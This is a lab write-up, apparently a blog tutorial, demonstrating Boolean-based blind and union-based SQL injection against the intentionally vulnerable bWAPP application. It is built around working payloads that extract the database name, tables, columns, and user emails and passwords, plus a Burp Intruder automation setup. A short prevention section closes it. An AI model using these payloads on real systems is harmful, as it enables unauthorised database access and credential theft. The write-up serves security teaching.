Disclaimer
  
  This write-up is meant purely for learning and educational purposes. The goal
 is to help security professionals, developers, and students understand how 
Boolean-Based Blind SQL Injection works so they can better defend their 
applications.  

Please remember that testing systems without permission is illegal and can 
lead to serious consequences. Use this knowledge responsibly and only in 
environments where you have explicit authorization.


Just to be clear, I’m using bWAPP for all the testing in this write-up. 
If you haven’t heard of it, it’s basically a playground full of intentional 
bugs, perfect for practicing web hacking without breaking anything in the real
world. Everything you see here has been tested only inside bWAPP.

In this blog, I want to break down one of the SQL injection techniques that I frequently come across in real-world assessments. It’s not the flashy, error-spitting kind of SQL injection you usually see in basic examples. Instead, it’s the quiet, sneaky one — the one that doesn’t show you anything directly but still leaks information if you ask the right questions.

What Is Boolean-Based Blind SQL Injection?

Boolean-Based Blind SQL Injection is a form of SQL injection where the application does not display database errors and does not return any visible SQL output.
Instead, the application behaves differently based on whether the injected condition is true or false.

You’re basically asking the database a series of yes/no questions, and the application’s response tells you which one is correct.

For example:
- If the page loads normally → the condition is TRUE
- If the page changes or returns an empty result → the condition is FALSE

So Let’s start

My first test was simple: I typed a single quote ( ’ ) into the field.
Boom — _incorrect syntax detected_.
A classic sign that something is happening inside the SQL query.

And when I inserted single quote hyphen hyphen space ( ’ — — ) The error disappear
This is because — — + comments out everything that comes after it, so the database ignores the rest of the original query.
This is one of the easiest ways to confirm that the parameter is injectable.

During testing, I used the classic Boolean payloads to check how the application responds to TRUE and FALSE conditions.

When I injected

' AND 1=1 --+

The application responded “The movie exists in our database!”
This means the SQL condition evaluated to TRUE, so the page behaved normally.

But when I changed the condition

' AND 1=2 --+

The response changed “The movie does not exist in our database!”
This clearly shows that the SQL condition evaluated to FALSE, and the application returned a different message.

This difference between TRUE and FALSE outputs is exactly what makes Boolean-Based Blind SQL Injection possible — the database never shows raw data, but the application’s behaviour reveals everything.

Fnd The Length of Database

We can use below payload for that

' AND (select length(database()))>1 --+

OR

' AND length((select database()))>1 --+

Also we can try below statements

' AND (SELECT LENGTH(table_schema) FROM information_schema.tables LIMIT 0,1) > 1 --+

OR

' AND LENGTH((SELECT table_schema FROM information_schema.tables LIMIT 0,1)) > 1 --+

Both of these queries perform the same check — they return TRUE as long as the database name length is greater than the number you specify.
When the condition becomes FALSE, the application’s response changes (in my case: “The movie does not exist in our database!”.

When I started checking the database name length using the `database()` function, I increased the number step by step. Everything looked normal until I reached:

' AND (select length(database()))>5 --+

OR

' AND length((select database()))>5 --+

As soon as I tested that value, the application’s message flipped from “The movie exists exists in our database!” to “movie does not exist in our database!.”

That switch told me immediately that the Boolean condition failed.
So the database name must be exactly 5 characters long — because anything up to 4 was TRUE, but 5 and above returned FALSE.

Now that I knew the length of the current database name, the next step was to extract it character by character. This is where Boolean-based blind SQLi becomes really interesting.

To get the **first character**, I used the following payloads

' AND (select substring(database(),1,1))='a' --+

OR

' AND substring((select database()),1,1)='a' --+

The response was:

“The movie does not exist in our database!” (False condition)

This meant the first character of the database name is not a.

So I changed a to b

' AND (select substring(database(),1,1))='b' --+

OR

' AND substring((select database()),1,1)='b' --+

This time, the application responded with
”The movie exists in our database!”

This confirmed that the first character of the current database name is b.

Once I confirmed that the first character of the current database name was b, the next step was to extract the remaining characters using the same Boolean-based approach.

To do that, I simply changed the position inside the SUBSTRING() function.

Extracting the 2nd character

To check the second character , I used

' AND (select substring(database(),2,1))='a' --+

OR

' AND (select substring(database(),2,1))='b' --+

here I change the value (database(),1,1) to (database(),2,1) and just like before , I change ‘a’ -> ‘b’ -> ‘c’ -> ‘d’ … until get ”The movie exists in our database!” response

When I change ‘a’ -> ‘b’ -> ‘c’ -> ‘d’ ….’w’ I got The movie exists in our database response in ‘w’
means the 2nd character is ‘w’

Change for 3rd, 4th ….

LIMIT 0,1

Means:
0 -> Start from the first row
1 -> return only one row

So if you want to check the NEXT row simply increase the number like below in above query.

LIMIT 1,1 → second row
LIMIT 2,1 → third row
LIMIT 3,1 → fourth row

Manually testing each character (a → b → c → …) for every position can take a lot of time.
To make the process faster and more efficient, we can automate the entire attack using Burp Suite Intruder.

Automating The Extraction With Burp Suite Intruder

To make the character-by-character extraction faster, I automated the process using Burp Suite Intruder. Here’s exactly how I set it up.

First, I captured one valid request in Burp Suite and sent it to Intruder.
Inside the payload, I marked two positions:

- Position 1 → the character index (1st, 2nd, 3rd…)
- Position 2 → the character I want to brute-force (`a` to `z`, `0` to `9`)

My payload looked something like this:

' AND SUBSTRING((SELECT DATABASE()),§1§,1)='§a§' --+

Now, both the position number and the test character become payload points.

Use Cluster Bomb Attack Type

Since I am testing two variables at the same time (the index and the character),
I selected the Cluster Bomb attack type.
This allows Intruder to try every combination of:

- Character positions (1 to 5)
- Characters (a, b, c… 0–9)

Perfect for blind SQLi automation.

Configure Payload Position 1 (Character Index)

For the **first payload position**, which represents the index inside

I selected:
- Payload type: Numbers
- Range: 1 to 5
- Step: 1

The reason:
I already discovered that the current database name length is 5 characters, so there are only 5 positions to test.

This means intruder will iterate 1,2,3,4,5 to extract each character.

Configure Payload Position 2 (Character to Test)

For the second payload position (the actual character guess), inside:

='§a§'

selected:
- Payload type:** Brute Forcer
- Minimum length: 1
- Maximum length: 1

This tells Burp to brute-force one character at a time.

Burp will automatically try:

a, b, c, d, e … z, A, B … 0–9, symbols (depending on configuration)

This is exactly what we need for Boolean-based blind SQLi.

Then Start the Attack

After running the automated Intruder attack, I collected the TRUE responses for each character position.
By combining all the characters that returned “The movie exists in our database!”, I finally reconstructed the entire database name.

The current database name turned out to be:
bwapp

Like above we can also extract Table name , Column name and data.

For that we can use below payloads.

Find the length of table name

' AND (select length(table_name) from information_schema.tables where table_schema=database() limit 1,1)>1 --+

OR

' AND length((select table_name from information_schema.tables where table_schema=database() limit 1,1))>1 --+

Extract the table name character by character

' AND substring((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1)='a' --+

OR

' AND (select substring(table_name,1,1) from information_schema.tables where table_schema=database() limit 1,1)='a' --+

Find the length of column name

' AND (select length(column_name) from information_schema.columns where table_name='users' limit 1,1)>1 --+

OR

' AND length((select column_name from information_schema.columns where table_name='users' limit 1,1))>1--+

Extract the column name character by character

' AND (select substring(column_name,1,1) from information_schema.columns where table_name='users' limit 1,1)='a' --+

OR

' AND substring((select column_name from information_schema.columns where table_name='users' limit 1,1),1,1)='a' --+

Find the length of data

' AND (select length(email) from userrs limit 1,1)>1 --+

OR

' AND length((select email from users limit 1,1))>1 --+

Extract the data character by character

' AND (select substring(email,1,1) from userrs limit 1,1)='a' --+

OR

' AND substring((select email from users limit 1,1),1,1)='a' --+

SQL injection is a security vulnerability that allows attackers to manipulate SQL queries by injecting malicious code through user input fields. This can lead to unauthorized access, data breaches, or data manipulation in a database.

How It Works:

• An attacker inputs malicious SQL code into user input fields.
• This code gets executed by the database, altering the query’s behavior.

Consequences:

• Unauthorized data access
• Data loss or corruption
• Potential full control of the database

Union-based SQL injection is a type of SQL injection attack where an attacker uses the UNION SQL operator to combine the results of multiple queries into a single result set. This technique allows the attacker to extract data from other tables in the database, often leading to unauthorized access to sensitive information.

Union based SQL injection allows an attacker to extract information from the database by extending the results returned by the original query.

The Union operator can only be used if the original/new queries have the same structure (number and data type of columns).

SELECT a, b FROM table1 UNION SELECT c, d FROM table2

This SQL query will return a single result set with two columns, containing values from columns a and b in table1 and columns c and d in table2.

Let’s start step by step

Find the vulnerable field

here I am using bwapp vulnerable application to perform UNION attack

Break the query

insert ’ (single quote) in search bar

When we insert ’ (single qoute) then if application give SQL syntax error mean that this field may be vulnerable from SQLi (SQL Injection) attack.

You can see below image what type of error will get

Joint the query

For join the SQL query we can use comment. comment will truncate a query and remove the portion of the original query that follows your input. for comment we can use — — (hyphen hyphen) , # (hash) or — — (hyphen hyphen space).

If get syntax error means that the query has not joined. Then try to different comment options

This time we have not get syntax error mean we can perform SQLi attack

To carry out an SQL injection Union attack, you need to ensure that your attack meets these two requirements.

1. How many columns are being returned from the original query?
2. Which columns returned from the original query are of a suitable data type to hold the results from the injected query?

There are two methods we can use to find columns which are use in the query.

1. ORDER BY
2. UNION SELECT

Find the columns which are use in the query (no name require)

Find columns using ORDER BY method

ORDER BY: We can try a series of ORDER BY until an error occurs, and it is the signal that this index is out of range:

’ ORDER BY 1 — 
’ ORDER BY 2 — 
’ ORDER BY 3 — 
…

This series of payloads modifies the original query to order the results by different columns in the result set. The column in an ORDER BY clause can be specified by its index, so you don’t need to know the names of any columns. When the specified column index exceeds the number of actual columns in the result set, the database returns an order clause error.

'ORDER BY 1-- 

Inject a series of ORDER BY clauses and incrementing the specified colun index until get error

'ORDER BY 8-- 

On ORDER BY 8 clause we got unknown column error means that there are 7 columns are use in the query.

Find the columns using UNION SELECT method

UNION SELECT: This other technique involves sending a UNION SELECT with an increasing number of NULL values (even a constant value like the number 1 is ok). In this way, we don’t get an error only when the number of “NULL” values is equal to the number of the table’s columns

’ UNION SELECT NULL- -
’ UNION SELECT NULL,NUL- -
’ UNION SELECT NULL,NULL,NULL- -
…

If the number of nulls does not match the number of columns, the database returns an error.
We use NULL as the values returned from the injected SELECT query because the data types in each column must be compatible between the original and the injected queries.
NULL is convertible to every common data type, so it maximizes the chance that the payload will succeed when the column count is correct.

' union select null -- 

' union select null,null --  

' union select null,null,null,null,null,null,null -- 

When we apply series of null 7 time we got output means that there are 7 columns use in the query.

NOTE: - 

On Oracle, every SELECT query must use the FROM keyword and specify a valid table.
There is a built-in table on Oracle called dual which can be used for this purpose.
So the injected queries on Oracle would need to look like:

' UNION SELECT NULL FROM DUAL -



The payloads described use the double-dash comment sequence - 
to comment out the remainder of the original query following the injection point.

On MySQL, the double-dash sequence must be followed by a space.

Alternatively, the hash character # can be used to identify a comment.

Finding columns with a useful data type

A SQL injection UNION attack enables you to retrieve the results from an injected query. The interesting data that you want to retrieve is normally in string form.
This means you need to find one or more columns in the original query results whose data type is, or is compatible with, string data.
After you determine the number of required columns, you can probe each column to test whether it can hold string data.
You can submit a series of UNION SELECT payloads that place a string value into each column in turn. For example, if the query returns four columns, you would submit:

’ UNION SELECT ‘a’,NULL,NULL,NULL- -
’ UNION SELECT NULL,’a’,NULL,NULL- -
’ UNION SELECT NULL,NULL,’a’,NULL- -
’ UNION SELECT NULL,NULL,NULL,’a’- -

If the column data type is not compatible with string data, the injected query will cause a database error

If an error does not occur, and the application’s response contains some additional content including the injected string value, then the relevant column is suitable for retrieving string data.

String concatenation

In some cases the query return a single column.
You can retrieve multiple values together within this single column by concatenating the values together.
You can include a separator to let you distinguish the combined values.

 ' union select null,username  | |  '~'  | | password  from users --  

Find Database type and version

You can potentially identify both the database type and version by injecting provider-specific queries to see if one works

The following are some queries to determine the database version for some popular database types:

' UNION SELECT null,version(),database(),null,null,null,null --  

Above output is too long and we want only intended output so that’s why we will insert non existing value in the search bar like -1 (minus 1)

-1' union select null,version(),null,null,null,null,null --  

Retrieve cureent username

-1' union select null,version(),current_user(),null,null,null,null --  

Find the databases available in the application

-1' union select null,table_schema,current_user(),null,null,null,null from information_schema.tables--   

Select one database which we found by previous query and find the Tables available in that database.

Here I am choose the bwapp database

Find the tables

 
-1'  union select null,table_name,null,null,null,null,null from information_schema.tables where table_schema=database()--  

Sometime application apply limit that time we have not get all table in single query

That time we can send multiple query using limit function and fetch the all tables available in database

Find the tables with limit function

-1'  union select null,table_name,null,null,null,null,null from information_schema.tables where table_schema=database() limit 0,1--  

-1'  union select null,table_name,null,null,null,null,null from information_schema.tables where table_schema=database() limit 1,1--  

Like above we can increase the limit and it’s steps according to application limitation

Limit 0,1 — — — — — -> id 0 (zero) to one step
Limit 1,1 — — — — —> id 1 to one step
Limit 2,1 — — — — — -> id 2 to one step
…..

Retrieve tables in single column using group_concat function

The GROUP_CONCAT() function in MySQL is used to concatenate data from multiple rows into one field.
This is an aggregate (GROUP BY) function that returns a String value if the group contains at least one non-NULL value.
Otherwise, it returns NULL.

 
-1'  union select null,group_concat(table_name),null,null,null,null,null from information_schema.tables where table_schema=database() --  

Maybe we can get some important data from the users table, so let’s penetrate more inside.

Find the columns

-1' union select null,column_name,null,null,null,null,null from information_schema.columns where table_name='users' --  

Also we can use the group_concat function for fetch tables name retrieving its entire columns name in single column.

-1' union select null,group_concat(column_name),null,null,null,null,null from information_schema.columns where table_name='users' --  

We have successfully retrieved all column names from inside the table users.

Enumerate the Data from Columns

Choose the columns which we want to enumerate

Here I am choosing email and password columns

You can choose any columns which you want to enumerate

 -1' union select null,email,password,null,null,null,null from users --  

Prevention:

• Use Prepared Statements: Ensure that user inputs are handled safely with parameterized queries.
• Input Validation: Rigorously validate and sanitize user inputs.
• Database Permissions: Limit the database user’s permissions to minimize impact if an injection occurs.

Union-based SQL injection can expose significant amounts of data if not properly mitigated, highlighting the importance of secure coding practices.